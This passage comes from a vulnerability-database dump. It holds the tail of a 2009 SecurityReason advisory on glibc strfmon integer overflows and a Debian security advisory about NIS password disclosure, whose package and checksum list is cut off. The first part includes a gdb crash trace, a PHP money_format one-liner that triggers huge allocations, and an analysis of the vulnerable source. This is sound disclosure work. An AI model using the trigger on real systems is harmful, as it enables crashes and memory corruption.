SIGSEGV, Segmentation fault.\r\n0x00e4327b in hack_digit.12295 () from /lib/libc.so.6\r\n(gdb) i r\r\neax 0x3ffffffe 1073741822\r\necx 0x34 52\r\nedx 0x2 2\r\nebx 0xf6eff4 16183284\r\nesp 0xbfffebb4 0xbfffebb4\r\nebp 0xbfffebe4 0xbfffebe4\r\nesi 0x34 52\r\nedi 0x3e 62\r\n\r\nesi 52.\r\n \r\nInteresting is that the PHP memory_limit has no control over what will happens in the level of the\r\nlibc. Function strfmon(3) can\r\nallocate a lot of data in memory without control by PHP memory_limit.\r\n\r\nFor example:\r\nphp -r 'money_format("%.1343741821i",1);'\r\n\r\nwill allocate ~1049MB real memory.\r\nmemory_limit can be less that 1049M\r\n\r\nStrange is the fact that nobody checked the code of glibc. The algorithm used in BSD libc and glibc\r\nis very similar. Funy.\r\n\r\nLet's see libc/stdlib/strfmon_l.c (glibc rev-1.5.2.4)\r\n- ---\r\n if (isdigit (*fmt))\r\n {\r\n /* Parse field width. */\r\n width = to_digit (*fmt);\r\n\r\n while (isdigit (*++fmt))\r\n {\r\n int val = to_digit (*fmt);\r\n\r\n if (width > LONG_MAX / 10\r\n || (width == LONG_MAX && val > LONG_MAX % 10))\r\n {\r\n __set_errno (E2BIG);\r\n return -1;\r\n }\r\n\r\n width = width * 10 + val;\r\n }\r\n\r\n /* If we don't have enough room for the demanded width we\r\n can stop now and return an error. */\r\n if (width >= maxsize - (dest - s))\r\n {\r\n __set_errno (E2BIG);\r\n return -1;\r\n }\r\n }\r\n- ---\r\n\r\nPerfect. The above code protects us. Very funy is this comment\r\n\r\n /* If we don't have enough room for the demanded width we\r\n can stop now and return an error. */\r\n\r\nBut what is below, is a mistake already\r\n- ---\r\n /* Recognize left precision. */\r\n if (*fmt == '#')\r\n {\r\n if (!isdigit (*++fmt))\r\n {\r\n __set_errno (EINVAL);\r\n return -1;\r\n }\r\n left_prec = to_digit (*fmt);\r\n\r\n while (isdigit (*++fmt))\r\n {\r\n left_prec *= 10;\r\n left_prec += to_digit (*fmt);\r\n }\r\n }\r\n\r\n /* Recognize right precision. */\r\n if (*fmt == '.')\r\n {\r\n if (!isdigit (*++fmt))\r\n {\r\n __set_errno (EINVAL);\r\n return -1;\r\n }\r\n right_prec = to_digit (*fmt);\r\n\r\n while (isdigit (*++fmt))\r\n {\r\n right_prec *= 10;\r\n right_prec += to_digit (*fmt);\r\n }\r\n }\r\n- ---\r\n\r\nTo overflow the left_prec, we need only give # ( if (*fmt == '#') ) before digits.\r\n\r\nSo, any uses like\r\n- ---\r\n info.prec = right_prec;\r\n info.width = left_prec + (right_prec ? (right_prec + 1) : 0);\r\n info.spec = 'f';\r\n info.is_long_double = is_long_double;\r\n info.group = group;\r\n info.pad = pad;\r\n info.extra = 1; /* This means use values from LC_MONETARY. */\r\n\r\n ptr = &fpnum;\r\n done = __printf_fp (&f._sbf._f, &info, &ptr);\r\n- ---\r\n\r\nare vulnerable.\r\n\r\n- --- 2. Greets ---\r\nsp3x Infospec Chujwamwdupe p_e_a pi3\r\n\r\n- --- 3. Contact ---\r\nAuthor: SecurityReason.com [ Maksymilian Arciemowicz ]\r\nEmail: cxib {a.t] securityreason [d0t} com\r\nGPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAkqyLtwACgkQpiCeOKaYa9aUmQCfdg3XMZ6X7+/qVzzwhTVflDy+\r\n4xsAoJCYxZadAh4i2Ct2ToLEJF6tGvLT\r\n=VYlL\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2009-09-18T00:00:00", "published": "2009-09-18T00:00:00", "id": "SECURITYVULNS:DOC:22482", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22482", "title": "SecurityReason: glibc x<=2.10.1 stdio/strfmon.c Multiple vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:33", "bulletinFamily": "software", "cvelist": ["CVE-2010-0015"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ------------------------------------------------------------------------\r\nDebian Security Advisory DSA-1973-1 security@debian.org\r\nhttp://www.debian.org/security/ Aurelien Jarno\r\nJanuary 19, 2010 http://www.debian.org/security/faq\r\n- ------------------------------------------------------------------------\r\n\r\nPackage : glibc, eglibc\r\nVulnerability : information disclosure\r\nProblem type : local\r\nDebian-specific: no\r\nCVE Id : CVE-2010-0015\r\nDebian Bug : 560333\r\n\r\nChristoph Pleger has discovered that the GNU C Library (aka glibc) and\r\nits derivatives add information from the passwd.adjunct.byname map to\r\nentries in the passwd map, which allows local users to obtain the\r\nencrypted passwords of NIS accounts by calling the getpwnam function.\r\n\r\n\r\nFor the oldstable distribution (etch), this problem has been fixed in\r\nversion 2.3.6.ds1-13etch10 of the glibc package.\r\n\r\nFor the stable distribution (lenny), this problem has been fixed in\r\nversion 2.7-18lenny2 of the glibc package.\r\n\r\nFor the unstable distribution (sid) this problem has been fixed in\r\nversion 2.10.2-4 of the eglibc package.\r\n\r\n\r\nWe recommend that you upgrade your glibc or eglibc package.\r\n\r\n\r\nUpgrade instructions\r\n- --------------------\r\n\r\nwget url\r\n will fetch the file for you\r\ndpkg -i file.deb\r\n will install the referenced file.\r\n\r\nIf you are using the apt-get package manager, use the line for\r\nsources.list as given below:\r\n\r\napt-get update\r\n will update the internal database\r\napt-get upgrade\r\n will install corrected packages\r\n\r\nYou may use an automated update by adding the resources from the\r\nfooter to the proper configuration.\r\n\r\n\r\nDebian GNU/Linux 4.0 alias etch\r\n- -------------------------------\r\n\r\nDebian (oldstable)\r\n- ---------------\r\n\r\nOldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\r\n\r\nSource archives:\r\n\r\n http://security.debian.org/pool/updates/main/g/glibc/glibc_2.3.6.ds1-13etch10.dsc\r\n Size/MD5 checksum: 2194 3985b011708649359ca02ddb917e66b0\r\n http://security.debian.org/pool/updates/main/g/glibc/glibc_2.3.6.ds1-13etch10.diff.gz\r\n Size/MD5 checksum: 920950 fda680921e06d9448442c0e40a82b4fa\r\n http://security.debian.org/pool/updates/main/g/glibc/glibc_2.3.6.ds1.orig.tar.gz\r\n Size/MD5 checksum: 13307585 d5e6ffe51e49ab29d513e600fb87cf54\r\n\r\nArchitecture independent packages:\r\n\r\n http://security.debian.org/pool/updates/main/g/glibc/glibc-doc_2.3.6.ds1-13etch10_all.deb\r\n Size/MD5 checksum: 1480556 cf597752b310168ddbe626ee79671a33\r\n http://security.debian.org/pool/updates/main/g/glibc/locales_2.3.6.ds1-13etch10_all.deb\r\n Size/MD5 checksum: 4009500 c2a534de63b9f6ee1e76f65abc49feb8\r\n\r\nalpha architecture (DEC Alpha)\r\n\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1_2.3.6.ds1-13etch10_alpha.deb\r\n Size/MD5 checksum: 4159642 3b121212db334fed297fcf6dab3c3680\r\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.3.6.ds1-13etch10_alpha.deb\r\n Size/MD5 checksum: 148272 d502d4869c0cf089c27648410d092213\r\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.3.6.ds1-13etch10_alpha.deb\r\n Size/MD5 checksum: 6200126 a982e949961fe1481e0e990692dbb51b\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-udeb_2.3.6.ds1-13etch10_alpha.udeb\r\n Size/MD5 checksum: 1065688 57bcd95f817ac7452f19a78978abfcf0\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-prof_2.3.6.ds1-13etch10_alpha.deb\r\n Size/MD5 checksum: 2001318 2b907dc3c2b8dd7561b2217f783f4c95\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-pic_2.3.6.ds1-13etch10_alpha.deb\r\n Size/MD5 checksum: 1500858 3f54c6f851e41c13d3bff64e59bd0e1f\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-dbg_2.3.6.ds1-13etch10_alpha.deb\r\n Size/MD5 checksum: 5237256 a2cb93e373aaecda3ffb07d3f67e96c4\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.3.6.ds1-13etch10_alpha.udeb\r\n Size/MD5 checksum: 10344 7c4cf8e44d6686cd2912a3f5ec64a8aa\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-dev_2.3.6.ds1-13etch10_alpha.deb\r\n Size/MD5 checksum: 2516890 d8709d8f6fdb5f2168b08ad75c5fa509\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.3.6.ds1-13etch10_alpha.udeb\r\n Size/MD5 checksum: 17140 5ea877d43c6e28a664fe065f1c814a60\r\n\r\namd64 architecture (AMD x86_64 (AMD64))\r\n\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.3.6.ds1-13etch10_amd64.udeb\r\n Size/MD5 checksum: 17204 b4cf2e844a92b8958c45e7fcbd79fdab\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.3.6.ds1-13etch10_amd64.deb\r\n Size/MD5 checksum: 4182738 7aba28d40da5e8e0bfc8967e0bac9314\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.3.6.ds1-13etch10_amd64.deb\r\n Size/MD5 checksum: 1578072 1363a2983499d4c5d83cb089811a9836\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.3.6.ds1-13etch10_amd64.deb\r\n Size/MD5 checksum: 2297644 69157cc8bb0a67cb6ee2f39e6fd5dd79\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.3.6.ds1-13etch10_amd64.udeb\r\n Size/MD5 checksum: 9576 c4639597ffbbf5131c00e0e94ab2d7bb\r\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.3.6.ds1-13etch10_amd64.deb\r\n Size/MD5 checksum: 6170032 59554e22ee31ae0dd53a67e0c6df4061\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-i386_2.3.6.ds1-13etch10_amd64.deb\r\n Size/MD5 checksum: 1586184 785fef40e67134584794e6a086395387\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.3.6.ds1-13etch10_amd64.deb\r\n Size/MD5 checksum: 1405238 8e37a4f86895b494ec7a06e7e35f4442\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.3.6.ds1-13etch10_amd64.deb\r\n Size/MD5 checksum: 2119318 8b0eab4f4648dc8d4898f51dc20ac8b1\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.3.6.ds1-13etch10_amd64.udeb\r\n Size/MD5 checksum: 1041568 2b32bea003088d26e118c4bbd200b2bd\r\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.3.6.ds1-13etch10_amd64.deb\r\n Size/MD5 checksum: 146764 c79245ecc4da1fd97a487dfda0e0525c\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-i386_2.3.6.ds1-13etch10_amd64.deb\r\n Size/MD5 checksum: 3068822 194139a75531cde3daf20c0266941571\r\n\r\narm architecture (ARM)\r\n\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.3.6.ds1-13etch10_arm.udeb\r\n Size/MD5 checksum: 8518 19bd3a7f7d78a88d9e0144b228a39b8f\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.3.6.ds1-13etch10_arm.deb\r\n Size/MD5 checksum: 5220770 33969aa6fdfccbf0377f8abe0fe3bd07\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.3.6.ds1-13etch10_arm.deb\r\n Size/MD5 checksum: 3943752 b09b5dacdb210af9176e5120fe64408f\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.3.6.ds1-13etch10_arm.deb\r\n Size/MD5 checksum: 1221324 a87fc95fdf31c88965817ba80bef426e\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.3.6.ds1-13etch10_arm.deb\r\n Size/MD5 checksum: 1501344 785b3b14831a908eff81d45773f71f3f\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.3.6.ds1-13etch10_arm.deb\r\n Size/MD5 checksum: 2016466 f59ea889e5abd0e216577c41f1643dc2\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.3.6.ds1-13etch10_arm.udeb\r\n Size/MD5 checksum: 931268 fd8b04e8467b57393c4fa879b2701cf9\r\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.3.6.ds1-13etch10_arm.deb\r\n Size/MD5 checksum: 6192452 ca1e02a22223e1458864364647e4ce04\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.3.6.ds1-13etch10_arm.udeb\r\n Size/MD5 checksum: 12992 91443531e77f48a582713703f6f72e6c\r\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.3.6.ds1-13etch10_arm.deb\r\n Size/MD5 checksum: 141716 0159bab80a7ae05ac0c0ccfacabb37a7\r\n\r\nhppa architecture (HP PA RISC)\r\n\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.3.6.ds1-13etch10_hppa.udeb\r\n Size/MD5 checksum: 1053816 92606b4a88d9077635401e546d804700\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.3.6.ds1-13etch10_hppa.deb\r\n Size/MD5 checksum: 2342264 b7d60a9297c5e3805df229dbb0a84f00\r\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.3.6.ds1-13etch10_hppa.deb\r\n Size/MD5 checksum: 149642 33f9a874523a091c20b1a3a87040665e\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.3.6.ds1-13etch10_hppa.udeb\r\n Size/MD5 checksum: 9690 e4295c97851f47c78a07526aa01508b3\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.3.6.ds1-13etch10_hppa.deb\r\n Size/MD5 checksum: 1838362 f34d8ec6dcf0683251685dabaacd7fae\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.3.6.ds1-13etch10_hppa.deb\r\n Size/MD5 checksum: 5048572 e68ad72e1ba1b31b2198ef71cbec30e7\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.3.6.ds1-13etch10_hppa.udeb\r\n Size/MD5 checksum: 17466 fd893f59f98d1418c23f989d903deadd\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.3.6.ds1-13etch10_hppa.deb\r\n Size/MD5 checksum: 1409944 195ae4d239695076cbfc0996a88b98a0\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.3.6.ds1-13etch10_hppa.deb\r\n Size/MD5 checksum: 4295920 2f3ae03b676b3ed39774053eda4e8ecc\r\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.3.6.ds1-13etch10_hppa.deb\r\n Size/MD5 checksum: 6509860 9cf578571d21319595711e0a7cb79b45\r\n\r\ni386 architecture (Intel ia32)\r\n\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.3.6.ds1-13etch10_i386.deb\r\n Size/MD5 checksum: 1299202 b0c2a1a83001605a12cf16a81aa5f4d1\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.3.6.ds1-13etch10_i386.udeb\r\n Size/MD5 checksum: 14338 b82a13ac006b2fe4ff2e6bfb14a34f2e\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.3.6.ds1-13etch10_i386.deb\r\n Size/MD5 checksum: 1062722 154d4655738862ad9dcb6f83afdca89c\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.3.6.ds1-13etch10_i386.deb\r\n Size/MD5 checksum: 4853870 9c636d56285537139c55224aae4b9dd7\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-xen_2.3.6.ds1-13etch10_i386.deb\r\n Size/MD5 checksum: 1127394 3ec3741a5e94548a8e1b41aca9577f92\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-i686_2.3.6.ds1-13etch10_i386.deb\r\n Size/MD5 checksum: 1122924 e4766f86319a4bf8f71bcb347e36aa2b\r\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.3.6.ds1-13etch10_i386.deb\r\n Size/MD5 checksum: 143136 5c66b596186c0cf52601b3321e8f6006\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.3.6.ds1-13etch10_i386.deb\r\n Size/MD5 checksum: 5449942 17e48c79d0fe791c64bd29937504622d\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-amd64_2.3.6.ds1-13etch10_i386.deb\r\n Size/MD5 checksum: 3438464 5368ebe3d13e91f36386dde5f1b2727f\r\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.3.6.ds1-13etch10_i386.deb\r\n Size/MD5 checksum: 6178590 28cdb341eb9e42a9fcfe5200d788050c\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-amd64_2.3.6.ds1-13etch10_i386.deb\r\n Size/MD5 checksum: 2030244 9b8c8369cadbe5fbfc1f4acc4131194a\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.3.6.ds1-13etch10_i386.udeb\r\n Size/MD5 checksum: 8536 8a2e335c439daa90dc0eac613350aa98\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.3.6.ds1-13etch10_i386.deb\r\n Size/MD5 checksum: 2728566 51eb4925d6f0229e4176eb327da53cf1\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.3.6.ds1-13etch10_i386.udeb\r\n Size/MD5 checksum: 730916 f11e0ed828a22bc05b7a98dd5f4a9dae\r\n\r\nia64 architecture (Intel ia64)\r\n\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-udeb_2.3.6.ds1-13etch10_ia64.udeb\r\n Size/MD5 checksum: 1258168 94be3180bc0c2717cb3d6f8d8843bb0e\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-dev_2.3.6.ds1-13etch10_ia64.deb\r\n Size/MD5 checksum: 4022146 c61ebac27a2c0079a7fe6b6c2b25dee3\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.3.6.ds1-13etch10_ia64.udeb\r\n Size/MD5 checksum: 12576 582391b772e14373092837244e374e73\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-prof_2.3.6.ds1-13etch10_ia64.deb\r\n Size/MD5 checksum: 2140854 834c1162eb0e238130300d46e16accb6\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1_2.3.6.ds1-13etch10_ia64.deb\r\n Size/MD5 checksum: 6405448 799ae21bc72a07cdc0921fca4edbe446\r\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.3.6.ds1-13etch10_ia64.deb\r\n Size/MD5 checksum: 165410 be53e71650ca09aa7eef465b7bd59210\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.3.6.ds1-13etch10_ia64.udeb\r\n Size/MD5 checksum: 21028 0b880e73916a41284d809dbe21cf139f\r\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.3.6.ds1-13etch10_ia64.deb\r\n Size/MD5 checksum: 6128622 a59c96c89c263755cb6c6fec1ccfc219\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-dbg_2.3.6.ds1-13etch10_ia64.deb\r\n Size/MD5 checksum: 5584726 a54b6c6dbb2a8468ccbcb214f471ed9a\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-pic_2.3.6.ds1-13etch10_ia64.deb\r\n Size/MD5 checksum: 1638622 c0dc39ec7c845979ed819792af9e0745\r\n\r\nmipsel architecture (MIPS (Little Endian))\r\n\r\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.3.6.ds1-13etch10_mipsel.deb\r\n Size/MD5 checksum: 6121780 0429ea7a908709bebb6dcf1d3100178a\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.3.6.ds1-13etch10_mipsel.deb\r\n Size/MD5 checksum: 3943222 eac023ecfb071c2ae42c15119a8d622a\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.3.6.ds1-13etch10_mipsel.udeb\r\n Size/MD5 checksum: 8888 fd797ed35504a765910e713a5145b6c2\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.3.6.ds1-13etch10_mipsel.deb\r\n Size/MD5 checksum: 1770304 c0d6a55ecd9eab9815fbdc64dfb6b2da\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.3.6.ds1-13etch10_mipsel.udeb\r\n Size/MD5 checksum: 14666 3b59893d657b9551323cdb6aa2d6bd90\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.3.6.ds1-13etch10_mipsel.deb\r\n Size/MD5 checksum: 1399918 016c2369e7c28cbee32136a1aeb9a8a9\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.3.6.ds1-13etch10_mipsel.udeb\r\n Size/MD5 checksum: 985476 7e16c25784b4b05011a2ab1960755123\r\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.3.6.ds1-13etch10_mipsel.deb\r\n Size/MD5 checksum: 144404 35aec97c9996fccf72078f3584a27991\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.3.6.ds1-13etch10_mipsel.deb\r\n Size/MD5 checksum: 2285748 a0a2d6d6003a16ac2dabb9d7e3bcc30d\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.3.6.ds1-13etch10_mipsel.deb\r\n Size/MD5 checksum: 5387612 23c25ed0aa885a82a2cb61cab5c9be9e\r\n\r\npowerpc architecture (PowerPC)\r\n\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.3.6.ds1-13etch10_powerpc.deb\r\n Size/MD5 checksum: 1749474 f5185757750351eba95f496499aba27f\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.3.6.ds1-13etch10_powerpc.udeb\r\n Size/MD5 checksum: 993404 5f86afee2e3fa2998947c7afd4ddfdf8\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.3.6.ds1-13etch10_powerpc.udeb\r\n Size/MD5 checksum: 8944 ea51faf5dea0594761429fe2f4abe993\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.3.6.ds1-13etch10_powerpc.deb\r\n Size/MD5 checksum: 5496348 c1ff3595ac9388e243defd3e03fde3a8\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-ppc64_2.3.6.ds1-13etch10_powerpc.deb\r\n Size/MD5 checksum: 4115548 94291eb321d6fbec73fdd3d5cc419f85\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-ppc64_2.3.6.ds1-13etch10_powerpc.deb\r\n Size/MD5 checksum: 1591456 aa8eb821575b98840c905d844facd2b2\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.3.6.ds1-13etch10_powerpc.deb\r\n Size/MD5 checksum: 3269468 d4de7d42aa5bd021bbf820170b5397f1\r\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.3.6.ds1-13etch10_powerpc.deb\r\n Size/MD5 checksum: 6496852 f3f296fcd3b16c88d6ffdcce0bed9434\r\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.3.6.ds1-13etch10_powerpc.deb\r\n Size/MD5 checksum: 143148 451deeceec109d2cb4e0cda32011d8b5\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.3.6.ds1-13etch10_powerpc.udeb\r\n Size/MD5 checksum: 15684 04c614964874c23007c6e52889856c73\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.3.6.ds1-13etch10_powerpc.deb\r\n Size/MD5 checksum: 1322128 bee883a8b157ebbc2a6f8f65ee3cd304\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.3.6.ds1-13etch10_powerpc.deb\r\n Size/MD5 checksum: 6332834 ccea48d0b112314e0a23caf252ebd2e1\r\n\r\ns390 architecture (IBM S/390)\r\n\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.3.6.ds1-13etch10_s390.deb\r\n Size/MD5 checksum: 5407866 1869b33f1a533ce266ef6423d7e719a6\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.3.6.ds1-13etch10_s390.deb\r\n Size/MD5 checksum: 5515832 eb0b302e40a3f7e941800c683f31e9f4\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.3.6.ds1-13etch10_s390.udeb\r\n Size/MD5 checksum: 15044 40af80440f6bfe38f62e7f1b48b868e1\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.3.6.ds1-13etch10_s390.deb\r\n Size/MD5 checksum: 1716866 dadaab99db6aacdbfc5b10a1f851c123\r\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.3.6.ds1-13etch10_s390.deb\r\n Size/MD5 checksum: 6511256 4a61d5773a84e2d1362961ee6efc28ab\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-s390x_2.3.6.ds1-13etch10_s390.deb\r\n Size/MD5 checksum: 1533632 2b2b80db7302e627759aff52510a45b8\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.3.6.ds1-13etch10_s390.udeb\r\n Size/MD5 checksum: 1008270 3a194ceb125a02010d25f6c62d39ef28\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-s390x_2.3.6.ds1-13etch10_s390.deb\r\n Size/MD5 checksum: 3535982 3a007c7ec6450a8007c2d320a07658ee\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.3.6.ds1-13etch10_s390.deb\r\n Size/MD5 checksum: 1316416 3ae384f44e89d2aff071ea9a67dbadc7\r\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.3.6.ds1-13etch10_s390.deb\r\n Size/MD5 checksum: 147524 952daa0e7e3a9984fae3995c0ee962e0\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.3.6.ds1-13etch10_s390.deb\r\n Size/MD5 checksum: 3167560 1f25b6b1f0f1edaf7d484fecf639818e\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.3.6.ds1-13etch10_s390.udeb\r\n Size/MD5 checksum: 9012 1113448f2d4c7e31694ee99e9223abd9\r\n\r\nsparc architecture (Sun SPARC/UltraSPARC)\r\n\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-sparcv9b_2.3.6.ds1-13etch10_sparc.deb\r\n Size/MD5 checksum: 1371620 79631ea0782eba78a574a9fdafbd6fbf\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-sparc64_2.3.6.ds1-13etch10_sparc.deb\r\n Size/MD5 checksum: 3764028 c6d7d08b5dea96cc33d4c8a65c0b769d\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.3.6.ds1-13etch10_sparc.udeb\r\n Size/MD5 checksum: 8028 863e0fbeabdb472240c031aed594f05c\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.3.6.ds1-13etch10_sparc.deb\r\n Size/MD5 checksum: 1298880 e254764758fe6186a09af76dc6227d6a\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.3.6.ds1-13etch10_sparc.deb\r\n Size/MD5 checksum: 5875134 3818f7ae808ed9fa0585904f2e3edc54\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.3.6.ds1-13etch10_sparc.udeb\r\n Size/MD5 checksum: 13796 7be4cb1c2e1a5d12be74b21b24451716\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-sparcv9_2.3.6.ds1-13etch10_sparc.deb\r\n Size/MD5 checksum: 1370586 a00ba5e3a64f2105e1a5afd451196516\r\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.3.6.ds1-13etch10_sparc.deb\r\n Size/MD5 checksum: 140922 674a9a630a30af952a32a6f372fb0ab5\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.3.6.ds1-13etch10_sparc.deb\r\n Size/MD5 checksum: 2112298 ac3373a80bd3d520876a57bebc410cb4\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-sparc64_2.3.6.ds1-13etch10_sparc.deb\r\n Size/MD5 checksum: 1730334 40744da7817503b254825bac950ba549\r\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.3.6.ds1-13etch10_sparc.deb\r\n Size/MD5 checksum: 6496208 cbea78c5cbc2c6f700c0252821bba629\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.3.6.ds1-13etch10_sparc.deb\r\n Size/MD5 checksum: 4032548 15b770200539f0064f0f37d61982f3ca\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.3.6.ds1-13etch10_sparc.deb\r\n Size/MD5 checksum: 1617226 dd99794ebfe1b2f6c6f77ba0d98d9a30\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.3.6.ds1-13etch10_sparc.udeb\r\n Size/MD5 checksum: 950022 ebe0c21b87cb51560e61d31dc996c4fc\r\n\r\nDebian GNU/Linux 5.0 alias lenny\r\n- --------------------------------\r\n\r\nDebian (stable)\r\n- ---------------\r\n\r\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\r\n\r\nSource archives:\r\n\r\n 